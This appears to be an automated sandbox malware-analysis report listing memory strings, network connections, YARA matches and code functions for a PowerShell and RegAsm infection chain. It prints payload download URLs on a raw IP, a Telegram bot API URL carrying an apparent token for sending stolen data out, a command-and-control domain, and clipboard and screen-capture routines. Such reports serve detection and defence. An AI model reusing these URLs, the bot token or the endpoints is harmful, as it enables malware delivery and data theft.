            Source: powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1790906998.0000000004F3E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1790419471.0000000004F33000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1790774230.0000000004F33000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000002.1793365456.0000000004F23000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1790419471.0000000004F3E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1791070899.0000000004F23000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000002.1793536887.0000000004F3E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000020.00000003.1790737456.0000000004F22000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790631639.0000000005563000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790414514.0000000005563000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1791273808.00000000053C1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1790884381.00000000053C0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000002.1794282631.00000000053C1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1790958954.00000000053D1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1792905831.000000000537D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1791099108.00000000053DC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1790616924.00000000053D1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1790616924.00000000053DC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000002.1794125947.0000000005386000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000022.00000002.1794353259.00000000053DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/hgfpj.exe
            Source: csc.exe, 00000020.00000003.1792137730.0000000004E91000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1792106867.00000000071E1000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000022.00000003.1792473123.0000000007181000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/hgfpj.exe0
            Source: csc.exe, 0000002E.00000003.1830606968.00000000054D1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/hgfpj.exe0M
            Source: powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1973866609.00000000085D1000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000021.00000003.1790958160.0000000005550000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790414514.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790558948.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1792494904.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1793533684.0000000005553000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1790796208.000000000556D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1793653792.000000000556D000.00000004.00000020.00020000.00000000.sdmp, 1yj35v5c.dll.33.drString found in binary or memory: http://147.45.44.131/infopage/hgfpj.exeL
            Source: curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1745016542.0000000003568000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/p
            Source: curl.exe, 0000001E.00000002.1745016542.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/p:
            Source: iviewers.dllString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1
            Source: curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1(
            Source: curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps14
            Source: curl.exe, 00000019.00000002.1746361769.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps19M
            Source: curl.exe, 0000001F.00000002.1753219734.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1U
            Source: curl.exe, 0000001F.00000002.1753219734.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1X
            Source: curl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1b
            Source: curl.exe, 0000001F.00000002.1753219734.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1l
            Source: curl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1n
            Source: curl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1p
            Source: powershell.exe, 0000001D.00000002.1831061949.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ubvsd.exe
            Source: powershell.exe, 0000001D.00000002.1894591464.0000000007A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ubvsd.exeq
            Source: powershell.exe, 0000000C.00000002.1694181605.00000000050CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: powershell.exe, 00000025.00000002.1987305959.00000000078AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 0000000C.00000002.1693041380.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1712723583.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1900139630.00000000032A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 0000001B.00000002.1953992530.0000000007570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microEU
            Source: powershell.exe, 00000018.00000002.1924356798.0000000006D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microM
            Source: RegAsm.exe, 0000002D.00000002.1868439481.0000000000DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: powershell.exe, 0000000D.00000002.1714471562.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftt
            Source: powershell.exe, 00000018.00000002.1829917121.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.veris
            Source: powershell.exe, 0000000C.00000002.1707694757.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1707861103.0000000005DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760180237.000000000579D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1931436944.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1874038631.00000000062FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000C.00000002.1694181605.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.0000000004F8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000C.00000002.1694181605.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.0000000004F8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 0000000C.00000002.1694181605.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004C9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004F87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: iviewers.dllString found in binary or memory: https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=76540
            Source: powershell.exe, 0000000E.00000002.1693280783.0000000003110000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1772070677.0000000006E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7453569667:aaexd9axbzzcee5q99ndzg6kmwdokbksvlu/sendmessage?chat_id=76540
            Source: powershell.exe, 0000000E.00000002.1694125670.0000000004F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org0
            Source: powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: RegAsm.exe, RegAsm.exe, 00000031.00000002.2174361705.000000000329C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000031.00000002.2172787217.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/
            Source: RegAsm.exe, 0000002D.00000002.1866051496.0000000000D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/0
            Source: RegAsm.exe, 0000002C.00000002.2037048019.0000000003313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/4
            Source: RegAsm.exe, 0000002B.00000002.2108864225.000000000144A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/53
            Source: RegAsm.exe, 0000002D.00000002.1866051496.0000000000D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/7
            Source: RegAsm.exe, 0000002B.00000002.2108864225.000000000144A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/80
            Source: RegAsm.exe, 00000031.00000002.2172787217.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/Q
            Source: RegAsm.exe, RegAsm.exe, 00000031.00000002.2174361705.000000000329C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000031.00000002.2172787217.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/api
            Source: RegAsm.exe, 0000002B.00000002.2109246697.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/apiF
            Source: RegAsm.exe, 0000002D.00000002.1866051496.0000000000D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/apip
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/cUC
            Source: RegAsm.exe, 00000031.00000002.2174361705.000000000329C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click/l
            Source: RegAsm.exeString found in binary or memory: https://fivenaii.click:443/api
            Source: RegAsm.exe, 0000002B.00000002.2110691890.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click:443/apiKa
            Source: RegAsm.exe, 0000002C.00000002.2033166708.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fivenaii.click:443/apiLSID
            Source: powershell.exe, 00000025.00000002.1915834227.00000000052E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000C.00000002.1694181605.000000000559D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.00000000052EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.000000000514A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004B24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.000000000577D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.000000000539F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000C.00000002.1707694757.0000000005DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1707861103.0000000005DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760180237.000000000579D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1901335764.000000000569B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1931436944.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1874038631.00000000062FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49776 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,45_2_00433E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,45_2_00433E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004348C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,45_2_004348C2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            .NET source code contains very large strings
            Source: 24.2.powershell.exe.4d8584c.1.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 24.2.powershell.exe.4d73b34.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 27.2.powershell.exe.56d5e3c.3.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 27.2.powershell.exe.56c4124.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.8b20000.4.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.58027a8.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.58144c0.2.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 37.2.powershell.exe.57072b8.1.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 37.2.powershell.exe.5718fd0.2.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F95EE250_2_6F95EE25
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F95EE253_2_6F95EE25
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F95EE254_2_6F95EE25
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04D151D312_2_04D151D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04D15D7812_2_04D15D78
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04D1B2D012_2_04D1B2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 43_2_0143910A43_2_0143910A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00ED4A4E44_2_00ED4A4E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00EC482944_2_00EC4829
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040860045_2_00408600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040C84045_2_0040C840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041D00345_2_0041D003
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040D02145_2_0040D021
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040D83C45_2_0040D83C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004038C045_2_004038C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042A0CA45_2_0042A0CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004338D045_2_004338D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042C0E645_2_0042C0E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004160E945_2_004160E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041B8F645_2_0041B8F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042C09E45_2_0042C09E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041C8A045_2_0041C8A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004388B045_2_004388B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042C09E45_2_0042C09E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040616045_2_00406160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041E96045_2_0041E960
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041816945_2_00418169
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040590045_2_00405900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040B10045_2_0040B100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042691045_2_00426910
